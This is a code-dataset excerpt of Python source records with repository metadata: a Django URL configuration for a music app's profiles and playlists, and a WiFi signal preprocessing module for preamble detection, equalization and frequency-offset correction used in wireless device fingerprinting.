return self._rule_ids
@rule_ids.setter
def rule_ids(self, value):
self._rule_ids = value
@property
def auto_generate_priority(self):
return self._auto_generate_priority
@auto_generate_priority.setter
def auto_generate_priority(self, value):
self._auto_generate_priority = value
@property
def owner(self):
return self._owner
@owner.setter
def owner(self, value):
self._owner = value
@property
def external_id(self):
return self._external_id
@external_id.setter
def external_id(self, value):
self._external_id = value
| true
| true
|
1c493ef011476abc24d0368d37585b1c67c3570d
| 1,548
|
py
|
Python
|
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | null | null | null |
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | 8
|
2020-06-05T18:08:05.000Z
|
2022-01-13T00:44:30.000Z
|
umusicfy/user_profile/urls.py
|
CarlosMart626/umusicfy
|
97e2166fe26d1fbe36df6bea435044ef3d367edf
|
[
"Apache-2.0"
] | null | null | null |
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
# Import Class Based Views
from .views import UserProfileView, UpdateUserProfileView, UpdateUserPasswordView, \
UserProfileDetailView, PlaylistDetailView, PlaylistCreateView, FollowUserProfileView, \
FollowPlaylistView, PlayListListView, AddToPlaylistView
urlpatterns = [
url(r'^$', login_required(UserProfileView.as_view()), name='user_profile'),
url(r'^(?P<username>[\w-]+)/playlist/$', login_required(PlayListListView.as_view()), name='user_all_playlists'),
url(r'^password/$', login_required(UpdateUserPasswordView.as_view()), name='user_change_password'),
url(r'^update/$', login_required(UpdateUserProfileView.as_view()), name='user_update_profile'),
url(r'^create-playlist/$', login_required(PlaylistCreateView.as_view()), name='user_create_playlist'),
url(r'^(?P<username>[\w-]+)/(?P<playlist_slug>[\w-]+)/$', login_required(PlaylistDetailView.as_view()),
name='user_playlist'),
url(r'^add-song/(?P<playlist_id>[\w-]+)/(?P<song_id>[\w-]+)/$', login_required(AddToPlaylistView.as_view()),
name='add_song_playlist'),
url(r'^(?P<pk>[0-9]+)/$', login_required(UserProfileDetailView.as_view()), name='visit_user_profile'),
url(r'^follow-user/(?P<user_id>[0-9]+)/$', login_required(FollowUserProfileView.as_view()),
name='visit_user_profile'),
url(r'^follow-playlist/(?P<playlist_id>[0-9]+)/$', login_required(FollowPlaylistView.as_view()),
name='visit_user_profile'),
]
| 57.333333
| 116
| 0.720284
|
from django.contrib.auth.decorators import login_required
from django.conf.urls import url
from .views import UserProfileView, UpdateUserProfileView, UpdateUserPasswordView, \
UserProfileDetailView, PlaylistDetailView, PlaylistCreateView, FollowUserProfileView, \
FollowPlaylistView, PlayListListView, AddToPlaylistView
urlpatterns = [
url(r'^$', login_required(UserProfileView.as_view()), name='user_profile'),
url(r'^(?P<username>[\w-]+)/playlist/$', login_required(PlayListListView.as_view()), name='user_all_playlists'),
url(r'^password/$', login_required(UpdateUserPasswordView.as_view()), name='user_change_password'),
url(r'^update/$', login_required(UpdateUserProfileView.as_view()), name='user_update_profile'),
url(r'^create-playlist/$', login_required(PlaylistCreateView.as_view()), name='user_create_playlist'),
url(r'^(?P<username>[\w-]+)/(?P<playlist_slug>[\w-]+)/$', login_required(PlaylistDetailView.as_view()),
name='user_playlist'),
url(r'^add-song/(?P<playlist_id>[\w-]+)/(?P<song_id>[\w-]+)/$', login_required(AddToPlaylistView.as_view()),
name='add_song_playlist'),
url(r'^(?P<pk>[0-9]+)/$', login_required(UserProfileDetailView.as_view()), name='visit_user_profile'),
url(r'^follow-user/(?P<user_id>[0-9]+)/$', login_required(FollowUserProfileView.as_view()),
name='visit_user_profile'),
url(r'^follow-playlist/(?P<playlist_id>[0-9]+)/$', login_required(FollowPlaylistView.as_view()),
name='visit_user_profile'),
]
| true
| true
|
1c49404f0513b7d760f2819862a1b1a1b9b0b8f1
| 48,784
|
py
|
Python
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 12
|
2020-03-05T12:24:37.000Z
|
2022-01-07T15:10:37.000Z
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 5
|
2020-06-29T02:17:14.000Z
|
2021-06-24T22:22:23.000Z
|
preproc/preproc_wifi.py
|
metehancekic/wireless-fingerprinting
|
41872761260b3fc26f33acec983220e8b4d9f42f
|
[
"MIT"
] | 5
|
2020-11-01T17:49:46.000Z
|
2022-03-05T02:52:11.000Z
|
'''
Contains code for fractionally spaced equalization, preamble detection
Also includes a modified version of Teledyne's data read and preprocessing code
'''
import numpy as np
import os
import json
import csv
import math
import fractions
import resampy
from tqdm import tqdm, trange
import matplotlib
import matplotlib.pyplot as plt
from scipy.fftpack import fft, ifft, fftshift, ifftshift
import ipdb
from sklearn.preprocessing import normalize
def preprocess_wifi(data_dict, sample_duration, sample_rate, preprocess_type=1, progress=True):
'''
Detects preamble and extract its
'''
signal_indices = range(len(data_dict['data_file']))
if progress is True:
signal_indices = tqdm(signal_indices)
flag = 0
for i in signal_indices:
signal = data_dict['signal'][i]
orig_sample_rate = data_dict['capture_sample_rate'][i]
start_index = 0
end_index = math.ceil(sample_duration * orig_sample_rate)
if orig_sample_rate == np.int(200e6):
if (preprocess_type == 2) or (preprocess_type == 3):
lowFreq = data_dict['freq_lower_edge'][i]
upFreq = data_dict['freq_upper_edge'][i]
Fc = data_dict['capture_frequency'][i]
signal, flag_i = detect_frame(signal, lowFreq, upFreq, Fc, verbose=False)
flag = flag + flag_i
if preprocess_type == 3:
signal = frac_eq_preamble(signal)
start_index = np.int(start_index)
end_index = np.int(end_index)
if (preprocess_type == 1) or (preprocess_type == 2) or (orig_sample_rate != np.int(200e6)):
signal = signal[start_index:end_index] # extract needed section of signal
with np.errstate(all='raise'):
try:
signal = signal / rms(signal) # normalize signal
except FloatingPointError:
# print('data_file = '+str(data_dict['data_file'][i]) + ',\t reference_number = '+str(data_dict['reference_number'][i]))
try:
# print('Normalization error. RMS = {}, Max = {}, Min = {}, Data size = {}'.format(rms(signal), np.abs(signal).min(), np.abs(signal).max(), signal.shape))
signal += 1.0/np.sqrt(2*signal.size) + 1.0/np.sqrt(2*signal.size)*1j
except FloatingPointError:
# print('i = {}, signal.shape = {}'.format(i, signal.shape))
# print('start_index = {}, end_index = {}'.format(start_index, end_index))
signal_size = end_index - start_index
signal = np.ones([signal_size]) * (1.0 + 1.0*1j)/np.sqrt(2*signal_size)
if (preprocess_type == 1) or (orig_sample_rate != np.int(200e6)):
freq_shift = (data_dict['freq_upper_edge'][i] +
data_dict['freq_lower_edge'][i])/2 - data_dict['capture_frequency'][i]
# baseband signal w.r.t. center frequency
signal = shift_frequency(signal, freq_shift, orig_sample_rate)
# filter and downsample signal
signal = resample(signal, orig_sample_rate, sample_rate)
if (preprocess_type == 2):
signal = resample(signal, orig_sample_rate, sample_rate)
data_dict['signal'][i] = signal
# data_dict['freq_lower_edge'][i] = -sample_rate/2.
# data_dict['freq_upper_edge'][i] = sample_rate/2.
# data_dict['sample_start'][i] = 0
# data_dict['sample_count'][i] = len(signal)
data_dict['center_frequency'][i] = (
data_dict['freq_upper_edge'][i] + data_dict['freq_lower_edge'][i])/2.
data_dict['sample_rate'][i] = sample_rate
if (preprocess_type == 2) or (preprocess_type == 3):
print('Successful frame detection on {:.2f}% of signals'.format(
100.0-flag*100.0/len(data_dict['data_file'])))
return data_dict
def frac_eq_preamble(rx, verbose=False):
'''
Fractionally equalize preamble
https://ieeexplore.ieee.org/document/489269
'''
# print('Hello!')
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
stf_64 = ifft(ifftshift(Stf_64))
# stf = stf_64[:16]
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
ltf = ifft(ifftshift(Ltf))
tx = np.concatenate((stf_64[:-32], stf_64, stf_64, ltf[-32:], ltf, ltf))
L = 160
N = 320
rx = rx.reshape([-1, 1])
R = np.zeros([L, L]) + 0j
p = np.zeros([L, 1]) + 0j
for i in range(N):
j = 10*i
R += rx[j:j+L].dot(rx[j:j+L].conj().T)
p += rx[j:j+L] * tx[i].conj()
c, residuals, rank, sing = np.linalg.lstsq(R, p)
# h = c[::-1].conj()
# rx_eq = np.convolve(h, rx, mode='full')[np.int(L/2):-np.int(L/2)]
# signal_eq = rx_eq[::10][:1600]
signal_eq = np.zeros([N, 1]) + 0j
for i in range(N):
j = 10*i
signal_eq[i] = rx[j:j+L].T.dot(c.conj())
return signal_eq.flatten()
def detect_frame(complex_signal, lowFreq, upFreq, Fc, verbose=False):
'''
Detects preamble and extract its
'''
Fs = 200e6
flag = 0
# ----------------------------------------------------
# Filter out-of-band noise
# ----------------------------------------------------
N = complex_signal.shape[0]
if N % 2 != 0:
complex_signal = complex_signal[:-1]
N -= 1
low_ind = np.int((lowFreq-Fc)*(N/Fs) + N/2)
up_ind = np.int((upFreq-Fc)*(N/Fs) + N/2)
lag = np.int((-Fc + (lowFreq+upFreq)/2)*(N/Fs) + N/2) - np.int(N/2)
X = fftshift(fft(complex_signal))
X[:low_ind] = 0 + 0j
X[up_ind:] = 0 + 0j
X = np.roll(X, -lag)
complex_signal = ifft(ifftshift(X))
# ----------------------------------------------------
# Coarse frame detection (using STF)
# ----------------------------------------------------
guard_band_upsamp = np.int(2e-6*Fs) # 2 usec
n_win = 1600-160 # ?
lag = 160
search_length_stf_upsamp = min(2*guard_band_upsamp+1, np.int(complex_signal.size))
autocorr_stf_upsamp = np.zeros(search_length_stf_upsamp)
a = np.zeros(search_length_stf_upsamp)+0j
p = np.zeros(search_length_stf_upsamp)
for n in range(search_length_stf_upsamp):
sig1 = complex_signal[n:n+n_win].reshape(1, -1)
sig2 = complex_signal[n+lag:n+n_win+lag].conj().reshape(1, -1)
a[n] = sig1.dot(sig2.T)
# p[n] = np.sum(np.abs(sig1)**2)
p[n] = np.sqrt(np.sum(np.abs(sig1)**2)*np.sum(np.abs(sig2)**2))
autocorr_stf_upsamp = np.abs(a)/p
frame_start_autocorr_upsamp = np.argmax(autocorr_stf_upsamp)
# ----------------------------------------------------
# Guard band sanity check
# ----------------------------------------------------
n_short_upsamp = 1600
if frame_start_autocorr_upsamp <= 2*guard_band_upsamp:
# sig3 = complex_signal[frame_start_autocorr_upsamp+np.int(n_short_upsamp/2):frame_start_autocorr_upsamp+n_short_upsamp-160].conj().copy()
# sig4 = complex_signal[frame_start_autocorr_upsamp+np.int(n_short_upsamp/2)+160:frame_start_autocorr_upsamp+n_short_upsamp].copy()
# df1_upsamp = 1/160 * np.angle(sig3.dot(sig4.T))
# complex_signal[frame_start_autocorr_upsamp:] *= np.exp(-1j*np.arange(0,complex_signal.size - frame_start_autocorr_upsamp)*df1_upsamp).flatten()
if verbose == True:
print('Autocorr prediction = {}'.format(frame_start_autocorr_upsamp))
# print('Freq offset_upsamp = {:.2f} KHz'.format(df1_upsamp* 2e8 / (2*np.pi*1e3)))
else:
if verbose == True:
print('Autocorr detection failed\n Prediction = {}'.format(frame_start_autocorr_upsamp))
frame_start_autocorr_upsamp = guard_band_upsamp
# df1_upsamp = 0
flag = 1
return complex_signal[frame_start_autocorr_upsamp:], flag
def offset_compensate_preamble(preamble_in, fs=200e6, verbose=False, option=1):
"""
Function that strips out the effect of the offset from the preamble.
df = 1/16 arg(sum_{n=0}^{N_short - 1 - 16} s[n]* s'[n+16] )
s[n] <---- s[n]* e^(j.n.df)
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(320 samples)
fs - Sampling frequency
[Verbose] - Verbose
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600 # Length of short preamble
n_long = 1600 # Length of long preamble
L = 160 # length of single short sequence
N = 640 # length of single long sequnce
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# Coarse estimation
# sig3 = preamble[n_short//2: n_short-L].conj().copy()
# sig4 = preamble[n_short//2 + L: n_short].copy()
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
elif fs == 20e6:
if preamble.size != 320:
raise Exception('Size of preamble is {}, but it should be 320.'.format(preamble.size))
n_short = 160 # Length of short preamble
n_long = 160 # Length of long preamble
L = 16 # length of single short sequence
N = 64 # length of single long sequence
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# Coarse estimation
sig3 = preamble[np.int(n_short/2):n_short-L].conj().copy()
sig4 = preamble[np.int(n_short/2)+L:n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short+32:n_short+32+N].conj().copy()
sig6 = preamble[n_short+N+32:n_short+n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
if option == 1:
return preamble
elif option == 2:
return preamble, freq_offset
else:
raise NotImplementedError
def get_residuals_preamble(preamble_in, fs, method='subtraction', channel_method='frequency', verbose=False, label=''):
"""
Function that reconstructs the preamble fed into this function with the channel and CFO effects
and returns the difference between original preamble and reconstructed one (residuals):
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(3200 samples)
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
preamble_orig = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
sig3 = preamble[: n_short-L].conj().copy()
sig4 = preamble[L: n_short].copy()
df1 = 1./L * np.angle(sig3.dot(sig4.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# Fine estimation
sig5 = preamble[n_short + 2*L: n_short + 2*L + N].conj().copy()
sig6 = preamble[n_short + N+2*L: n_short + n_long].reshape(1, -1).copy()
df2 = 1./N * np.angle(sig5.dot(sig6.T))
preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
freq_offset = np.array([df1, df2])
cfo_total = np.multiply(np.exp(1j*np.arange(0, preamble.size)*df1).flatten(),
np.exp(1j*np.arange(0, preamble.size)*df2).flatten())
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
# ipdb.set_trace()
Ltf_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Ltf, np.zeros(32*9) + 1j * np.zeros(32*9)))
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf # because Ltf is 1's and 0's
h_hat = np.roll(ifft(ifftshift(H_hat)), -N//2)
# H_1_hat[ind_all] = Ltf_1_rx[ind_all]*Ltf
# H_2_hat[ind_all] = Ltf_2_rx[ind_all]*Ltf
# H_hat[ind_all] = Ltf/Ltf_avg_rx[ind_all]
# ltf_1_interpolated = ifft(ifftshift(H_1_hat*Ltf_interpolated))
# ltf_2_interpolated = ifft(ifftshift(H_2_hat*Ltf_interpolated))
# ltf_total = np.concatenate((ltf_1_interpolated[-N//2:], ltf_1_interpolated, ltf_2_interpolated))
# ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
if channel_method == 'time':
ltf_interpolated = ifft(ifftshift(Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * (np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[
N//2-1:-N//2])/rms(np.convolve(np.concatenate((stf_total, ltf_total)), h_hat)[N//2-1:-N//2])
elif channel_method == 'frequency':
ltf_interpolated = ifft(ifftshift(H_hat * Ltf_interpolated))
ltf_total = np.concatenate(
(ltf_interpolated[-N//2:], ltf_interpolated, ltf_interpolated))
Stf_64_interpolated = np.concatenate(
(np.zeros(32*9) + 1j * np.zeros(32*9), Stf_64, np.zeros(32*9) + 1j * np.zeros(32*9)))
stf_64_interpolated = ifft(ifftshift(H_hat * Stf_64_interpolated))
stf_total = np.concatenate(
(stf_64_interpolated[-N//2:], stf_64_interpolated, stf_64_interpolated))
preamble_constructed = cfo_total * np.concatenate((stf_total, ltf_total))
# stf_ch_cfo = ifft(ifftshift(fftshift(fft(preamble_constructed[N//2:N+N//2]))*H_hat))
# ltf_ch_cfo = ifft(ifftshift(fftshift(fft(preamble_constructed[n_short+N//2:n_short+N//2+N]))*H_hat))
# stf_total_cfo_ch_added = np.concatenate((stf_ch_cfo[-N//2:], stf_ch_cfo, stf_ch_cfo))
# ltf_total_cfo_ch_added = np.concatenate((ltf_ch_cfo[-N//2:], ltf_ch_cfo, ltf_ch_cfo))
# preamble_constructed = np.concatenate((stf_total_cfo_ch_added, ltf_total_cfo_ch_added))
if method == 'division':
residuals = preamble_orig/(preamble_constructed+0.001)
elif method == 'subtraction':
residuals = preamble_orig - preamble_constructed
# # ----------------------------------------------------
# # Preamble equalization
# # ----------------------------------------------------
# ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
# ind_null = np.concatenate((np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)) )) + (N//2)
# ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
# mask_data = np.ones(N)
# mask_data_pilots = np.ones(N)
# mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
# mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
# ind_all_all = np.arange(-(N//2), (N//2)) + N//2
# ind_data = ind_all_all[mask_data==1]
# ind_data_pilots = ind_all_all[mask_data_pilots==1]
# h_hat = ifft(ifftshift(H_hat))
# Stf_1_eq = fftshift(fft(preamble[n_short-2*N:n_short-N]))
# Stf_2_eq = fftshift(fft(preamble[n_short-N:n_short]))
# Ltf_1_eq = fftshift(fft(preamble[n_short+n_long-2*N:n_short+n_long-N]))
# Ltf_2_eq = fftshift(fft(preamble[n_short+n_long-N:n_short+n_long]))
# Stf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Stf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Ltf_1_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Ltf_2_eq[ind_data_pilots] /= (H_hat[ind_data_pilots]+0.001)
# Stf_1_eq[ind_guard] = 0
# Stf_2_eq[ind_guard] = 0
# Ltf_1_eq[ind_guard] = 0
# Ltf_2_eq[ind_guard] = 0
# Stf_1_eq[ind_null] = 0
# Stf_2_eq[ind_null] = 0
# Ltf_1_eq[ind_null] = 0
# Ltf_2_eq[ind_null] = 0
# # Sanity check
# Ltf_1_eq = Ltf
# Ltf_2_eq = Ltf
# Stf_1_eq = Stf_64
# Stf_2_eq = Stf_64
# stf_1_eq = ifft(ifftshift(Stf_1_eq))
# stf_2_eq = ifft(ifftshift(Stf_2_eq))
# ltf_1_eq = ifft(ifftshift(Ltf_1_eq))
# ltf_2_eq = ifft(ifftshift(Ltf_2_eq))
# preamble_eq = np.concatenate((stf_1_eq[:-(N//4)], stf_1_eq, stf_2_eq[:-(N//4)], stf_2_eq, ltf_1_eq[:-(N//2)], ltf_1_eq, ltf_2_eq))
return residuals, preamble_constructed # , h_hat, H_hat
def basic_equalize_preamble(preamble_in, fs, verbose=False, label=''):
"""
Function that strips out the effect of the channel from the preamble.
It does the following:
1. LTI channel estimation (with delay spread <= length of cyclic prefix)
2. Remove the channel estimate from the preamble
Inputs:
preamble - Preamble containing effects of the channel and Tx nonlinearities
(320 samples)
### NotImplemented: freq_offset - Dict containing freq offset
Output:
preamble_eq - Preamble with the channel stripped out (320 samples)
### NotImplemented: preamble_eq_offset - Equalized preamble with frequency offset
"""
# if fs!=20e6:
# raise NotImplementedError
preamble = preamble_in.copy()
if fs == 200e6:
if preamble.size != 3200:
raise Exception('Size of preamble is {}, but it should be 3200.'.format(preamble.size))
n_short = 1600
n_long = 1600
L = 160
N = 640
# ----------------------------------------------------
# Frequency offset correction
# ----------------------------------------------------
# sig3 = preamble[np.int(n_short/2):n_short-L].conj().copy()
# sig4 = preamble[np.int(n_short/2)+L:n_short].copy()
# df1 = 1/L * np.angle(sig3.dot(sig4.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df1).flatten()
# sig5 = preamble[n_short+2*L:n_short+2*L+N].conj().copy()
# sig6 = preamble[n_short+N+2*L:n_short+n_long].reshape(1,-1).copy()
# df2 = 1/N * np.angle(sig5.dot(sig6.T))
# preamble *= np.exp(-1j*np.arange(0, preamble.size)*df2).flatten()
# ------------------------------------------------------------------------
# LTI channel estimation (with delay spread <= length of cyclic prefix)
# ------------------------------------------------------------------------
Stf_64 = np.sqrt(13/6)*np.array([0, 0, 0, 0, 0, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0,
1+1j, 0, 0, 0, 0, 0, 0, 0, -1-1j, 0, 0, 0, -1-1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 1+1j, 0, 0, 0, 0, 0, 0, 0])
Ltf = np.array([0, 0, 0, 0, 0, 0, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1, 1, 1, 1, -1, -1, 1, 1, -1, 1, -1, 1, 1, 1,
1, 0, 1, -1, -1, 1, 1, -1, 1, -1, 1, -1, -1, -1, -1, -1, 1, 1, -1, -1, 1, -1, 1, -1, 1, 1, 1, 1, 0, 0, 0, 0, 0])
Ltf1_rx = fftshift(
fft(preamble[n_short+np.int(n_long/5):n_short+np.int(n_long/5 + n_long*2/5)]))
Ltf2_rx = fftshift(fft(preamble[n_short+np.int(n_long/5 + n_long*2/5):n_short+n_long]))
Ltf_mid_rx = fftshift(
fft(preamble[n_short + 2*L - np.int(L/2):n_short + 2*L+N - np.int(L/2)]))
Ltf_avg_rx = (Ltf1_rx + Ltf2_rx)/2
# Ltf_avg_rx = Ltf1_rx
# Ltf_avg_rx = Ltf2_rx
# Ltf_mid_rx = Ltf_avg_rx
# AA = np.zeros((N, N)) + 0j
# for m in range(N):
# for n in range(L+1):
# AA[m, n] = Ltf[m] * np.exp(-1j*2*np.pi*m*n/N)
# A = AA[:, :L+1] * np.exp(1j*np.pi*np.arange(L+1)).reshape(1, -1)
# ind_all = np.arange(-32, 32) + 32
# ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + 32
# ind_null = np.array([0]) + 32
# mask_data_pilots = np.ones(64)
# mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
# ind_data_pilots = ind_all[mask_data_pilots==1]
# h_hat_small, residuals, rank, singular_values = np.linalg.lstsq(A[ind_data_pilots,:], Ltf_mid_rx[ind_data_pilots], rcond=None)
# h_hat = np.zeros(N)+0j
# h_hat[:L+1] = h_hat_small
# # h_hat = np.roll(h_hat, -np.int(L/2))
# H_hat = fftshift(fft(h_hat))
ind_all = np.arange(-32, 32) + (N//2)
H_hat = np.zeros((N)) + 1j*np.zeros((N))
# ipdb.set_trace()
H_hat[ind_all] = Ltf_avg_rx[ind_all]*Ltf
# H_hat[ind_all] = Ltf/Ltf_avg_rx[ind_all]
if verbose is True:
freq = np.arange(-32, 32)
# H_hat_coarse = Ltf_mid_rx*Ltf
H_hat_coarse = H_hat[ind_all]
h_hat_coarse = ifft(ifftshift(H_hat_coarse))
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(freq, np.abs(H_hat_coarse))
plt.grid(True)
plt.title('Magnitude')
plt.xlabel('Frequency bin')
plt.subplot(1, 2, 2)
# plt.stem(freq, np.unwrap(np.angle(H_hat)))
plt.stem(freq, np.angle(H_hat_coarse))
plt.title('Phase')
plt.xlabel('Frequency bin')
plt.suptitle('Coarse estimation'+label)
plt.grid(True)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
plt.figure(figsize=[10, 3])
plt.subplot(1, 2, 1)
plt.stem(np.abs(h_hat_coarse))
plt.title('Magnitude')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.subplot(1, 2, 2)
# plt.stem(np.unwrap(np.angle(h_hat)))
plt.stem(np.angle(h_hat_coarse))
plt.title('Phase')
plt.xlabel('Time (in samples)')
plt.grid(True)
plt.suptitle('Coarse estimation'+label)
plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.93])
# plt.figure(figsize=[10, 3])
# plt.subplot(1,2,1)
# plt.stem(freq, np.abs(H_hat))
# plt.grid(True)
# plt.title('Magnitude')
# plt.xlabel('Frequency bin')
# plt.subplot(1,2,2)
# # plt.stem(freq, np.unwrap(np.angle(H_hat)))
# plt.stem(freq, np.angle(H_hat))
# plt.title('Phase')
# plt.xlabel('Frequency bin')
# plt.suptitle('Frequency domain least squares estimation')
# plt.grid(True)
# plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
# plt.figure(figsize=[10, 3])
# plt.subplot(1,2,1)
# plt.stem(np.abs(h_hat))
# plt.title('Magnitude')
# plt.xlabel('Time (in samples)')
# plt.grid(True)
# plt.subplot(1,2,2)
# # plt.stem(np.unwrap(np.angle(h_hat)))
# plt.stem(np.angle(h_hat))
# plt.title('Phase')
# plt.xlabel('Time (in samples)')
# plt.grid(True)
# plt.suptitle('Frequency domain least squares estimation')
# plt.tight_layout(rect=[0.01, 0.03, 0.98, 0.9])
plt.show()
# ----------------------------------------------------
# Preamble equalization
# ----------------------------------------------------
ind_guard = np.concatenate((np.arange(-32, -26), np.arange(27, 32))) + (N//2)
ind_null = np.concatenate(
(np.array([0]), np.arange(-(N//2), -32), np.arange(32, (N//2)))) + (N//2)
ind_pilots = np.array([-21, -7, 7, 21]) + (N//2)
mask_data = np.ones(N)
mask_data_pilots = np.ones(N)
mask_data[list(np.concatenate((ind_guard, ind_null, ind_pilots)))] = 0
mask_data_pilots[list(np.concatenate((ind_guard, ind_null)))] = 0
ind_all_all = np.arange(-(N//2), (N//2)) + N//2
ind_data = ind_all_all[mask_data == 1]
ind_data_pilots = ind_all_all[mask_data_pilots == 1]
